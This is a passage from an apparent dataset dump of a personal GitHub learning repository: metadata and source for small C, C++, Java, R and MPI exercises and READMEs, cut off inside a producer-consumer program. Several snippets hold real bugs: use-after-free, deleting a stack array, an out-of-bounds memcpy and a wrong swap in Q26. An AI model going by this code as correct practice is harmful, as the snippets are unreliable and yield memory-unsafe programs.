Install & Run\n+ download R from R language official site.\n+ run in each indivial folder.\n\n## Strtucture\n```\n.\n├── docs\n├── harwork\n│   ├── hardway // hardway\n│   ├── helloworld // helloworld\n│   └── packages // package usage\n├── projects\n│   └── Github_Analyzer // todo\n└── README.md\n```\n## reference\n\n+ [R-Project](https://www.r-project.org/)\n+ [The R Manuals](https://cran.r-project.org/manuals.html)\n+ [Learn R, in R](http://swirlstats.com/)\n" }, { "alpha_fraction": 0.7523302435874939, "alphanum_fraction": 0.7656458020210266, "avg_line_length": 38.52631759643555, "blob_id": "20b2980556c5e81a0ca4203e6a57544bd5ab49c7", "content_id": "74467407f20677fef027417d85d55ad6600ff9a5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 751, "license_type": "permissive", 
"max_line_length": 198, "num_lines": 19, "path": "/java/hardwork/swing/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Swing\n`jskyzero` `2017/12/31`\n\n## Overview\n\n+ Java Swing is a part of Java Foundation Classes (JFC) that is used to create window-based applications. It is built on the top of AWT (Abstract Windowing Toolkit) API and entirely written in java.\n\n+ JFC:The Java Foundation Classes (JFC) are a set of GUI components which simplify the development of desktop applications.\n\n![hierarchy of java swing API](http://www.javatpoint.com/images/swinghierarchy.jpg)\n\nhow to create a frame:\n1. By creating the object of Frame class (association) \n2. By extending Frame class (inheritance)\n\n## Reference\n\n+ [Getting Started with Swing](https://docs.oracle.com/javase/tutorial/uiswing/start/index.html)\n+ [Java Swing Tutorial](http://www.javatpoint.com/java-swing)\n" }, { "alpha_fraction": 0.6186046600341797, "alphanum_fraction": 0.6232557892799377, "avg_line_length": 15.576923370361328, "blob_id": "581e2d0bad4d543247249e1e2350e4e23d028644", "content_id": "e94fb6b400b7ec30ec9f0db672c77a43f53c0f63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 430, "license_type": "permissive", "max_line_length": 45, "num_lines": 26, "path": "/c/projects/MPI/hardway/MPI_comm_free.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n#include<mpi.h>\n\nint main(int argc, char **argv)\n{\n\tint myid, numprocs;\n\tMPI_Comm new_comm;\n\t\n\tMPI_Init(&argc, &argv);\n\t\n\tMPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\t\n\tMPI_Comm_dup(MPI_COMM_WORLD, &new_comm);\n\t\n\t// free\n\tMPI_Comm_free(&new_comm);\n\t\n\tif(myid == 0) {\n\t\tif (new_comm == MPI_COMM_NULL)\n\t\t\tprintf(\"Now the comm is freed.\\n\");\n\t}\n\n\tMPI_Finalize();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5080214142799377, 
"alphanum_fraction": 0.51871657371521, "avg_line_length": 12.357142448425293, "blob_id": "159b6762ea44803468aeedd4262bb54428a9a4d9", "content_id": "3331a451fbcaa91a0a8edfba5de965bd636c7ad2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 187, "license_type": "permissive", "max_line_length": 27, "num_lines": 14, "path": "/c/hardwork/hardway/student_struct2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\nint main() {\n\tstruct student{\n\t\tchar * name;\n\t\tchar * marks;\n\t};\n\t struct student sa = {\n\t \t\"abc\",\n\t \t\"87\"\n\t };\n\t printf(\"%s\",sa.marks);\n\t printf(\"%s\",(&sa)->name);\n\t\n}\n" }, { "alpha_fraction": 0.47727271914482117, "alphanum_fraction": 0.5045454502105713, "avg_line_length": 19.047618865966797, "blob_id": "71c7560fe8dc13bdf0677769ce3cc3834c41530c", "content_id": "2262832fed39f45c5891031e9be5e3267997840f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "permissive", "max_line_length": 50, "num_lines": 21, "path": "/c/hardwork/library/string/memcpy.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n int array[] = {1, 2, 3};\r\n int target[3];\r\n\r\n memset(target, 0, sizeof(int) * 3);\r\n puts(\"initial array\");\r\n for (int i = 0; i < 3; i++) {\r\n printf(\"index: %d value: %d\\n\", i, target[i]);\r\n }\r\n\r\n\r\n memcpy(target, array, sizeof(int) * 3);\r\n puts(\"after copy array\");\r\n for (int i = 0; i < 3; i++) {\r\n printf(\"index: %d value: %d\\n\", i, target[i]);\r\n }\r\n return 0;\r\n}" }, { "alpha_fraction": 0.35568514466285706, "alphanum_fraction": 0.4169096350669861, "avg_line_length": 20.4375, "blob_id": "71327494459a46e30d65920cc9c6ad4e3fcc4a02", "content_id": "15288446791880f095ee89b5ead695a50ea7511b", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 343, "license_type": "permissive", "max_line_length": 36, "num_lines": 16, "path": "/c/hardwork/hardway/about_ponirt.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n int a[5] = {10, 20, 30, 40, 50};\n int* p = a;\n printf(\"%p\\n\", a);\n printf(\"%p\\n\", p);\n printf(\"%p\\n\", &p);\n printf(\"%p\\n\", &a[0]);\n printf(\"%p\\n\", &a[1]);\n printf(\"%d\\n\", a[4] - a[3]);\n printf(\"%d\\n\", a[2]);\n printf(\"%d\\n\", a[-1]);\n printf(\"%d\\n\", *(p + 7));\n if ((a[1] = 2) != 2) printf(\"NO\");\n}\n" }, { "alpha_fraction": 0.5880281925201416, "alphanum_fraction": 0.6795774698257446, "avg_line_length": 21.83333396911621, "blob_id": "ccabff2b4584cf476929ee44fe202a6c8045ce8c", "content_id": "8724cc3708764d0898e444a3156660d01318a6ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/R/projects/Words_Analyzer/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Words_Analyzer\r\n`jskyzero` `2018/04/22`\r\n\r\n## Overview\r\n\r\n+ use `R` language to construct a wordcloud\r\n+ powered by `jiebaR`, `sqldf`, `wordcloud2`\r\n\r\n\r\n## Reference: \r\n+ [如何生成关键词云图?](https://www.zhihu.com/question/24658552/answer/153704543)\r\n+ [wordart](https://wordart.com/create)" }, { "alpha_fraction": 0.42093023657798767, "alphanum_fraction": 0.43953487277030945, "avg_line_length": 21.6842098236084, "blob_id": "9a0a4eb35f7711e607ec96fa9537e92799279130", "content_id": "4053735c985347adda9c64187506db34f93404be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 430, "license_type": "permissive", "max_line_length": 55, "num_lines": 19, "path": "/java/projects/algorithms/chapter1/part1/Q26.java", "repo_name": 
"jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q26\n */\npublic class Q26 {\n public static void main(String[] args) {\n int a = 0, b = 1, c = 2, t = 0;\n\n if (a > b) {t = a; a = b; b = t;}\n if (a > c) {t = a; a = c; c = t;}\n if (b > c) {t = b; b = c; c = a;}\n\n // why can sort ?\n // a b c\n // a > b and a > c makes a is smallest\n // b > c makes b is smaller than c\n // so a <= b <= c\n // this is like basic sort let smaller one be left.\n }\n}" }, { "alpha_fraction": 0.6508688926696777, "alphanum_fraction": 0.6777251362800598, "avg_line_length": 23.346153259277344, "blob_id": "fae5955d837e6d83c0ef32e2cdb98c8465b58529", "content_id": "383673bfd1408b822a44cbbb49891908a29c9f10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 699, "license_type": "permissive", "max_line_length": 91, "num_lines": 26, "path": "/java/projects/algorithms/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Algorithm\n`jskyzero` `2018/02/15`\n\n## Overview\n+ these codes is about ***Algorithms 4th*** questions and answers.\n+ ~~I don't have internet connection now, so~~ I simplely use universal java api.\n+ Try to read the book and see the questions before each part, give your own answer.\n\n## Install & Run\n+ Install Java: you should hava install some version for instance 1.8 JDK in your computer.\n+ Run Code: use javac to compile the code and use java to run the class.\n\n## Structure\n\n```\n.\n├── chapter1 // 基础\n├── chapter2 // 排序\n├── chapter3 // 查找\n├── chapter4 // 图\n├── chapter5 // 字符串\n├── chapter6 // 背景\n└── README.md\n```\n\n## Reference\n" }, { "alpha_fraction": 0.4819819927215576, "alphanum_fraction": 0.5, "avg_line_length": 21.200000762939453, "blob_id": "f1fe69cb3bdf73c13a02940264308567a76e0084", "content_id": "83e47c159af99e8df004a9f2bb6a584115acfaed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", 
"length_bytes": 222, "license_type": "permissive", "max_line_length": 43, "num_lines": 10, "path": "/c/hardwork/hardway/undef.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint foo(int, int);\n#define foo(x, y) x / y + x\nint main() {\n int i = -6, j = 3;\n printf(\"%d \", foo(i + j, 3));\n#undef foo\n printf(\"%d\\n\", foo(i + j, 3));\n}\nint foo(int x, int y) { return x / y + x; }\n" }, { "alpha_fraction": 0.6699187159538269, "alphanum_fraction": 0.6715447306632996, "avg_line_length": 23.639999389648438, "blob_id": "7b9c9d470e9b7d836effe27bfec113e9ffc8443d", "content_id": "828d7e9b7816b6179192c11f090d2f054240a43d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 671, "license_type": "permissive", "max_line_length": 56, "num_lines": 25, "path": "/c/projects/MPI/hardway/MPI_group_rank.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world;\n int rank_of_group;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n // int MPI_Comm_group(MPI_Comm comm, MPI_Group *group)\n // MPI_Comm_group用来建立一个通信组对应的新进程组\n // int MPI_Group_rank(MPI_Group group, int *rank)\n // MPI_Group_rank查询调用进程在进程组里的rank\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n MPI_Group_rank(group_world, &rank_of_group);\n\n printf(\"myid: %d rank: %d\\n\", myid, rank_of_group);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.623115599155426, "alphanum_fraction": 0.643216073513031, "avg_line_length": 23.875, "blob_id": "08fbc4fddcd0af6d30bde7e705bda663b902b048", "content_id": "7d9952e733cad821f3851fac83d60b9c1d670b19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 398, "license_type": "permissive", "max_line_length": 62, 
"num_lines": 16, "path": "/R/harwork/hardway/variable.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# variables in R\n\n# Valid names should consist of letters, numbers, and '_' '.' \n# starts with a letter, or the dot not followed by a number.\n\ntoday.weather <- \"sun\"\n\"2017/09/03\" -> today.date\n\ncat (\"about today\\n\",\n \"\\bdate is \", today.date, \"\\n\",\n \"\\bweather is \", today.weather, \"\\n\")\n\n# find / letele variables\nprint(ls(all.names = TRUE))\nrm(today.weather)\nprint(ls(all.names = TRUE))\n" }, { "alpha_fraction": 0.5486284494400024, "alphanum_fraction": 0.576059877872467, "avg_line_length": 21.27777862548828, "blob_id": "b0b020eca38bfc451540a595b1ac4b4acc324c5d", "content_id": "278736623662db80bbd30bb371bcb992f5c2c4aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "permissive", "max_line_length": 64, "num_lines": 18, "path": "/c/hardwork/hardway/double_size.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <string.h>\n#include <stdio.h>\n\nint *doubleCapacity(int *list, int size) {\n size *= 2;\n // int *items;\n int *newItems = new int[size];\n memcpy(newItems, list, sizeof(int) * size);\n delete[] list;\n list = newItems;\n return list;\n}\n\nint main() {\n int list[5] = {1, 2, 3, 4, 5};\n int *newlist = doubleCapacity(list, 5);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", *(newlist + i));\n}\n" }, { "alpha_fraction": 0.7079365253448486, "alphanum_fraction": 0.720634937286377, "avg_line_length": 21.5, "blob_id": "17b0f40822247850ed1f8d9508b730fd07cec34c", "content_id": "0b619d508491b1a2579c25325ad5e23211e8bc7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 315, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/java/projects/gridworld/Part5/UnboundedGrid/test/UnboundedTest.java", 
"repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import static org.junit.Assert.*;\nimport org.junit.Test;\n\npublic class UnboundedTest\n{\n\t\n\t@Test \n\tpublic void testHello()\n\t{\n\t\tassertEquals(\"Hello World!\", \"Hello World!\");\n\t}\n}\n// javac -classpath .:junit-4.9.jar HelloWorldTest.java\n// java -classpath .:junit-4.9.jar -ea org.junit.runner.JUnitCore HelloWorldTest\n" }, { "alpha_fraction": 0.5519348382949829, "alphanum_fraction": 0.5621181130409241, "avg_line_length": 21.363636016845703, "blob_id": "51cbfeec4856ed7d050d4b79dd43e5232d841955", "content_id": "2b723337b2ba42b3f768373f575fb35a7dec4ddb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 491, "license_type": "permissive", "max_line_length": 81, "num_lines": 22, "path": "/java/projects/algorithms/chapter1/part1/Q5.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Scanner;\n\nclass Q5 {\n public static void main(String[] args) {\n \n Scanner in = new Scanner(System.in);\n System.out.println(\"input two double\");\n\n while (true) {\n if (!in.hasNextDouble()) break;\n double x = in.nextDouble();\n\n if (!in.hasNextDouble()) break;\n double y = in.nextDouble();\n\n System.out.println((x > 0 && x < 1) && (y > 0 && y < 1) ? 
\"true\": \"false\");\n System.out.println(\"input two double\");\n }\n\n in.close();\n }\n}" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 13.75, "blob_id": "6dd7662f74014b090cb2eed42e6c2a746e1164ad", "content_id": "dd102db9e66ed6320a5f76a47a4564e8dd9c8392", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 58, "license_type": "permissive", "max_line_length": 25, "num_lines": 4, "path": "/R/harwork/helloworld/helloworld.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# run like\n# Rscript helloworld.R\n\nprint(\"Hello World\")" }, { "alpha_fraction": 0.3880764842033386, "alphanum_fraction": 0.43532058596611023, "avg_line_length": 15.462963104248047, "blob_id": "32a16aedac238da2c85b702e8df99577b377f962", "content_id": "c2ee30c92188eae22da472aadd1f1c91768869c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 889, "license_type": "permissive", "max_line_length": 48, "num_lines": 54, "path": "/c/hardwork/hardway/sort_string.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <cstring>\n\nint a[128];\nchar* sortString(const char* const s) {\n int n = strlen(s);\n static char str[10005];\n\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n\n for (int i = 0; i < n; i++) {\n a[*(s + i)]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n str[j] = i;\n a[i]--;\n j++;\n }\n }\n return str;\n}\nvoid sortString(const char* const s, char* s1) {\n int n = strlen(s);\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n for (int i = 0; i < n; i++) {\n a[*(s + i)]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n s1[j] = i;\n a[i]--;\n j++;\n }\n }\n return;\n}\n\nint main() {\n char* str = \"bca\";\n char* s1 = sortString(str);\n std::cout << s1 << 
std::endl;\n\n char s2[100];\n sortString(str, s2);\n std::cout << s2 << std::endl;\n}\n" }, { "alpha_fraction": 0.5111989378929138, "alphanum_fraction": 0.5862977504730225, "avg_line_length": 17.975000381469727, "blob_id": "738ef22dba15039ed8011d26b838083beab6adee", "content_id": "513464e9d2148e7840e41d7d61371131ef53750b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 759, "license_type": "permissive", "max_line_length": 44, "num_lines": 40, "path": "/c/hardwork/hardway/char_and_string_type.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <assert.h> // for assert()\n\ntypedef char char_type1;\ntypedef char *char_type2;\ntypedef char(char_type3);\ntypedef char(*char_type4);\ntypedef char *(char_type5);\n\ntypedef char(str_type1)[2];\ntypedef char (*str_type2)[2];\n\nint main() {\n char_type1 ch1 = 'A';\n char_type2 ch2 = &ch1;\n assert(*ch2 = ch1);\n\n char_type3 ch3 = ch1;\n assert(ch3 = ch1);\n\n char_type4 ch4 = ch2;\n assert(*ch4 = ch3);\n\n char_type5 ch5 = ch4;\n assert(*ch5 == ch1);\n\n str_type1 str1 = \"A\";\n assert(str1[0] == 'A');\n assert(str1[1] == '\\0');\n\n char_type2 str0 = str1;\n assert(str0[0] == 'A');\n assert(str0[1] == '\\0');\n\n str_type2 str2 = &str1;\n assert(str2[0][0] == 'A');\n assert(str2[0][1] == '\\0');\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6280487775802612, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 32, "blob_id": "6e416a46021475a49448a406ce67aed13cb244d8", "content_id": "d10d8387842939e798f830702e73856ae4a73758", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "permissive", "max_line_length": 85, "num_lines": 5, "path": "/cplusplus/projects/Cocos2dx/docs/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## More Reference\n\n+ [Cocos2d-x 
用户手册](http://www.cocos.com/docs/native/)\n+ [Cocos2d-x v3.10 Reference](http://www.cocos2d-x.org/docs/api-ref/cplusplus/V3.10/)\n+ ..." }, { "alpha_fraction": 0.6959287524223328, "alphanum_fraction": 0.7048345804214478, "avg_line_length": 22.787878036499023, "blob_id": "cbcc06c8bcdb3bdfd89bc4a13a85c46f1f56e39e", "content_id": "ac08631cef4d3974a8cd957cc4c4fcbb6f7a19e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 786, "license_type": "permissive", "max_line_length": 112, "num_lines": 33, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/GameScene.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"cocos2d.h\"\n#include \"ui/CocosGUI.h\"\n#include <string>\n#include \"Global.h\"\nusing namespace cocos2d::ui;\n\n#include \"network/HttpClient.h\"\nusing namespace cocos2d::network;\n\nusing std::string;\n\nclass GameScene : public cocos2d::Layer\n{\npublic:\n // there's no 'id' in cpp, so we recommend returning the class instance pointer\n static cocos2d::Scene* createScene();\n\n // Here's a difference. 
Method 'init' in cocos2d-x returns bool, instead of returning 'id' in cocos2d-iphone\n virtual bool init();\n\n // implement the \"static create()\" method manually\n CREATE_FUNC(GameScene);\n\nprivate:\n float visibleHeight;\n float visibleWidth;\n TextField * score_field;\n TextField * rank_field;\n Button *submit_button;\n Button *rank_button;\n};\n\n" }, { "alpha_fraction": 0.45108696818351746, "alphanum_fraction": 0.4728260934352875, "avg_line_length": 14.333333015441895, "blob_id": "11bad2c626b2f1bc8edc7ea5763fcd1a56d12b56", "content_id": "d95111f1e9d88c1bb33f6ad80862118169dd8006", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 184, "license_type": "permissive", "max_line_length": 24, "num_lines": 12, "path": "/c/hardwork/hardway/num_float.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n unsigned int i = 23;\n signed char c = -23;\n if (i > c)\n printf(\"Yes\\n\");\n else if (i < c) {\n printf(\"%d\", c - i);\n printf(\"No\\n\");\n }\n}\n" }, { "alpha_fraction": 0.6228747963905334, "alphanum_fraction": 0.6522411108016968, "avg_line_length": 27.15217399597168, "blob_id": "37e067740b433c3c051cb588efb772a7c58a475d", "content_id": "00b51ae20f4f8cf4a19219159fc042cf09b78906", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1294, "license_type": "permissive", "max_line_length": 91, "num_lines": 46, "path": "/java/projects/algorithms/chapter1/part1/Q6.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.io.ByteArrayOutputStream;\nimport java.io.PrintStream;\nimport java.util.function.Supplier;\n\nclass Q6 {\n public static void changeDefultOutStream(ByteArrayOutputStream baos, PrintStream oldPS) {\n // Create a stream to hold the output\n PrintStream newPS = new PrintStream(baos);\n // Tell Java to use your special stream\n System.setOut(newPS);\n 
}\n\n public static void assertResultEqual(ByteArrayOutputStream baos, String result) {\n assert (baos.toString().equals(result));\n }\n\n public static void changeBackDefaultOutStream(PrintStream oldPS) {\n System.out.flush();\n System.setOut(oldPS);\n }\n\n public static void testCodes(Supplier<Integer> func, String result) {\n // IMPORTANT: Save the old System.out!\n PrintStream oldPS = System.out;\n ByteArrayOutputStream baos = new ByteArrayOutputStream();\n changeDefultOutStream(baos, oldPS);\n func.get();\n changeBackDefaultOutStream(oldPS);\n assertResultEqual(baos, result);\n }\n\n public static void main(String[] argv) {\n testCodes(() -> {\n int f = 0;\n int g = 1;\n for (int i = 0; i <= 8; i++) {\n System.out.print(f);\n f = f + g;\n g = f - g;\n }\n return 0;\n }, \"01123581321\");\n // f: 0 1 1 2 3 5 8 13 21 \n // g: 1 0 1 1 2 3 5 8 13\n }\n}" }, { "alpha_fraction": 0.41312742233276367, "alphanum_fraction": 0.4517374634742737, "avg_line_length": 13.44444465637207, "blob_id": "9cb236f8fce0ab551122e3567c3cd73a50b1bf90", "content_id": "090f81fae36ecf690ea43b4956a03891d5b8928b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 259, "license_type": "permissive", "max_line_length": 23, "num_lines": 18, "path": "/c/projects/POSIX/Lab1/1.0.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n printf(\"**1**\\n\");\n\n int pid_2 = fork();\n printf(\"**2**\\n\");\n\n if (pid_1 == 0) {\n int pid_3 = fork();\n printf(\"**3**\\n\");\n } else {\n printf(\"**4**\\n\");\n }\n return 0;\n}" }, { "alpha_fraction": 0.4978693127632141, "alphanum_fraction": 0.5213068127632141, "avg_line_length": 25.074073791503906, "blob_id": "5df1c386c730d35797ccb94899220213448ada5f", "content_id": "9f68d9209917db0eb45a7a99a2489599034b18d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", 
"length_bytes": 1408, "license_type": "permissive", "max_line_length": 77, "num_lines": 54, "path": "/c/hardwork/library/stdio/printf.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n\nvoid usage() {\n puts(\"\\nfunction printf\");\n puts(\"int printf (const char * format, ... );\");\n puts(\"Write the C string pointed by format to the standard output\");\n puts(\"\\nformat\");\n puts(\"%[flags][width][.preecision][length]specifier\");\n puts(\"specifier\t: d, i, u, o, x, f, e, g, a, c, s, p, n, %\");\n puts(\"flags\t\t: -, +, (space), #, 0\");\n puts(\"width\t\t: (number), *\");\n puts(\"precision\t: (.number), (.*)\");\n puts(\"specifiers\t: hh, h, l, ll, j, z, t, L\");\n}\n\nvoid practice_basic() {\n unsigned num = 520;\n float num2 = 520.12;\n \n printf(\"signed decimal integer %d\\n\", (int)num);\n printf(\"unsigned decimal integer %u\\n\", num);\n printf(\"unsigned octal %o\\n\", num);\n printf(\"unsigned hexadecimal integer %x\\n\", num);\n printf(\"decimal float point %f\\n\", num2);\n printf(\"scientific notation (mantissa/exponent), lowecase %e\\n\", num2);\n}\n\nvoid practice_master() {\n float num = 520.1314;\n\n printf(\"|+%f|\\n\", num);\n printf(\"| %f|\\n\", num);\n printf(\"|%+20f|\\n\", num);\n printf(\"|% 20f|\\n\", num);\n printf(\"|%-20f|\\n\", num);\n printf(\"|%-*.*f|\\n\", 20, 2, num);\n printf(\"|%20.2f|\\n\", num);\n}\n\nvoid practice() {\n practice_basic();\n practice_master();\n}\n\nint main() {\n usage();\n practice();\n\n unsigned i = -1;\n printf(\"%u\\t\", i);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 15.909090995788574, "blob_id": "7b89053e1437f9c11137c56f221194792c2ba75a", "content_id": "e07bc87a935a27b0300b5a7e5274b1ee4bdbde48", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 195, "license_type": "permissive", "max_line_length": 46, "num_lines": 
11, "path": "/c/hardwork/library/string/strchr.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n\r\n const char str[] = \"Hello World!\";\r\n char const * const index = strchr(str, 'e');\r\n fprintf(stdout, \"%c\", *index);\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.6225895285606384, "alphanum_fraction": 0.6323373317718506, "avg_line_length": 25.077348709106445, "blob_id": "76432470f2ac8c9f852d4386777970b8815fe0e0", "content_id": "c863e8a296f2baae73a317fb084d8ebb46b93f50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5033, "license_type": "permissive", "max_line_length": 79, "num_lines": 181, "path": "/c/projects/POSIX/Lab3/3.1.produce_consume.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * 生产者消费者问题\n * 读入测试数据文件,按照要求运行进程。\n * jskyzero 2017(R)\n */\n\n#include <stdio.h> // for fopen(), perror()\n#include <stdlib.h> // for exit(), atoi(), malloc(), free()\n#include <string.h> // for strtok()\n#include <unistd.h> // for sleep()\n#include <pthread.h> // for pthread_create(), pthread_exit()\n#include <semaphore.h> // for sem_t, sem_wait(), sem_post()\n\n// buffer size\n#define BUFFER_SIZE 5\n// max 4 num, each max 10 char, so we let buffer be 50\n#define LINE_BUFFER_SIZE 50\n// this file is copy from powerpoint\n#define FILE_NAME \"3.1.testfile\"\n// for strtok()\n#define KEY_STR \" \"\n// for product_id\n#define HAVA_PRODUCT_ID_TYPE 'P'\n// if you need DEBUG, then uncomment it\n// #define DEBUG_TAG 1\n\n// buffer item type\ntypedef int buffer_data_type;\n// test data store type\ntypedef struct test_data {\n int index; // 正整数,表示线程序号。\n char type; // 相应线程角色,P表示生产者,C表示消费者。\n int begin_time; // 正数,表示存放或取出操作的开始时间\n int duration; // 正数,表示操作的持续时间。\n buffer_data_type product_id; // 正数(仅生产者有),表示生产的产品号。\n} test_data_type;\n\nint buffer_index;\nbuffer_data_type buffer[BUFFER_SIZE];\nsem_t 
empty, full, mutex;\n\nvoid read_file_work();\nvoid line_buffer_to_test_data(char *, test_data_type *);\nvoid print_test_data(test_data_type *);\nvoid work_with_test_data(test_data_type *);\nvoid *produce(void *data);\nvoid *consume(void *data);\nint insert_item(buffer_data_type);\nint remove_item(buffer_data_type *);\n\nint main() {\n // empty 与full 将采用标准计数信号量,而mutex 将采用二进制信号量。\n sem_init(&mutex, 0, 1); // empty (以记录有多少空位)\n sem_init(&empty, 0, BUFFER_SIZE); // full (以记录有多少满位)\n sem_init(&full, 0, 0); // 保护对缓冲插入与删除的操作\n // Main Part\n read_file_work();\n // creat and then destory\n sem_destroy(&mutex);\n sem_destroy(&empty);\n sem_destroy(&full);\n // wait wait for all pthreads to complete\n pthread_exit(0);\n}\n\nint insert_item(buffer_data_type item) {\n if (buffer_index < BUFFER_SIZE) {\n buffer[buffer_index] = item;\n buffer_index++;\n return 0;\n } else {\n return -1;\n }\n}\n\nint remove_item(buffer_data_type *item) {\n if (buffer_index > 0) {\n *item = buffer[--buffer_index];\n return 0;\n } else {\n return -1;\n }\n}\n\nvoid *produce(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&empty);\n sem_wait(&mutex);\n printf(\"ProduceID:%10d \", data->index);\n if (insert_item(data->product_id)) {\n perror(\"INSERT ERROR\\n\");\n } else {\n printf(\"InsertData:%10d\\n\", data->product_id);\n }\n free(data);\n sleep(data->duration);\n sem_post(&mutex);\n sem_post(&full);\n return (NULL);\n}\n\nvoid *consume(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&full);\n sem_wait(&mutex);\n buffer_data_type buffer_item;\n printf(\"ConsumeID:%10d \", data->index);\n if (remove_item(&buffer_item)) {\n perror(\"REMOVE ERROR\\n\");\n } else {\n printf(\"RemoveData:%10d\\n\", buffer_item);\n }\n free(data);\n sleep(data->duration);\n sem_post(&mutex);\n sem_post(&empty);\n return (NULL);\n}\n\nvoid work_with_test_data(test_data_type *data) {\n 